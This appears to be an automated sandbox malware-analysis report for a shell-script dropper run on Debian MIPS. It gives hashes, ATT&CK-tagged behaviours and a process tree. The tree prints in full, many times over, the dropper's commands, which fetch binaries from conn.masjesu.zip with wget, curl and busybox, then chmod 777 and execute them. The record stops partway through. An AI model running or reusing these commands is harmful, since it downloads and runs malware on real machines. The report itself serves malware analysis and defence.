ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d

Analysis

max time kernel
143s
max time network
146s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21-11-2024 08:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d.sh
Size

10KB
MD5

5043473f1d1be685c2c3cd5616d93b8b
SHA1

24aa735b4efb07ddf576d7af72a4cc3acbdf3d90
SHA256

ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d
SHA512

b59ae01412c9c4828947586654be13f48fb5cda3a2ff42c57fe636520260f3f8f5975bdbe4b4883cfed3c1014cf2b4d73cf196deafe7accc98e9a341adb4f23b
SSDEEP

192:4hja2joogwd9ovzbVksHC+OZ2qZEEidvKa2joozCd9ovz1ksHC+W2qZEEx:A0TMiX

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
911	chmod
918	chmod
756	chmod
883	chmod
988	chmod
995	chmod
953	chmod
967	chmod
863	chmod
904	chmod
897	chmod
925	chmod
946	chmod
1002	chmod
740	chmod
825	chmod
981	chmod
876	chmod
974	chmod
749	chmod
817	chmod
786	chmod
932	chmod
939	chmod
960	chmod
1009	chmod
840	chmod
890	chmod

Executes dropped EXE 28 IoCs

Processes:

tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoee8NickSVHHGc0CKiNoIeQQeLHFwsfykCoztEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9NeEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdOJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGxlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4aGHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4acayWFU8o0VGt74yfWT1bYNSzBkMqiwstoetQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Nee8NickSVHHGc0CKiNoIeQQeLHFwsfykCozJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

curlbusyboxwgetwgetcurlbusyboxbusyboxbusyboxbusyboxbusyboxcurlwgetcurlcurlwgetwgetwgetbusyboxwgetwgetwgetbusyboxwgetwgetbusyboxbusyboxwgetbusyboxcurlbusyboxcurlcurlwgetcurlwgetbusyboxcurlcurlwgetcurlwgetwgetcurlbusyboxcurlbusyboxwgetcurlcurlbusyboxbusyboxbusyboxcurlcurlcurlcurlwgetbusyboxcurlwgetcurlcurlwgetbusybox

pid	process
950	curl
987	busybox
759	wget
793	wget
829	curl
836	busybox
931	busybox
938	busybox
980	busybox
1008	busybox
772	curl
893	wget
908	curl
992	curl
963	wget
991	wget
998	wget
1001	busybox
752	wget
845	wget
879	wget
952	busybox
921	wget
928	wget
755	busybox
812	busybox
828	wget
903	busybox
929	curl
959	busybox
985	curl
849	curl
868	wget
880	curl
900	wget
966	busybox
1006	curl
822	curl
886	wget
887	curl
907	wget
935	wget
957	curl
973	busybox
801	curl
889	busybox
914	wget
922	curl
873	curl
882	busybox
896	busybox
994	busybox
915	curl
936	curl
978	curl
971	curl
744	wget
824	busybox
901	curl
949	wget
999	curl
753	curl
821	wget
924	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl

/tmp/ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d.sh
/tmp/ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d.sh
1⤵
PID:709
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:715
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:717
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:729
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:739
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:742
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:743
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:744
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:748
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:750
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:751
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:752
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:753
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:755
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:756
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:757
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:758
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
  PID:759
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:772
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:781
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:789
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:792
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - System Network Configuration Discovery
  PID:793
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:801
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - System Network Configuration Discovery
  PID:812
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:820
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - System Network Configuration Discovery
  PID:821
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:822
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - System Network Configuration Discovery
  PID:824
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:827
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:828
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:829
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:836
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:844
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - System Network Configuration Discovery
  PID:845
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:849
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:858
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:867
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - System Network Configuration Discovery
  PID:868
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:873
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:875
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:876
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:877
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:878
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:879
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:880
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:882
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:885
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - System Network Configuration Discovery
  PID:886
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - System Network Configuration Discovery
  PID:889
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:892
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:893
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:896
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:897
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:898
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:899
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:900
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:903
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:905
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:906
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - System Network Configuration Discovery
  PID:907
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:908
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:910
- /bin/chmod
  chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - File and Directory Permissions Modification
  PID:911
- /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  ./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Executes dropped EXE
  PID:912
- /bin/rm
  rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:913
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - System Network Configuration Discovery
  PID:914
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:915
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:917
- /bin/chmod
  chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - File and Directory Permissions Modification
  PID:918
- /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  ./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Executes dropped EXE
  PID:919
- /bin/rm
  rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:920
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:921
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:922
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:924
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:927
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:928
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:929
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:931
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:932
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:933
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:934
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:935
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:936
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:938
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:939
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:940
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:941
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:942
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:943
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:945
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:946
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:947
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:948
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
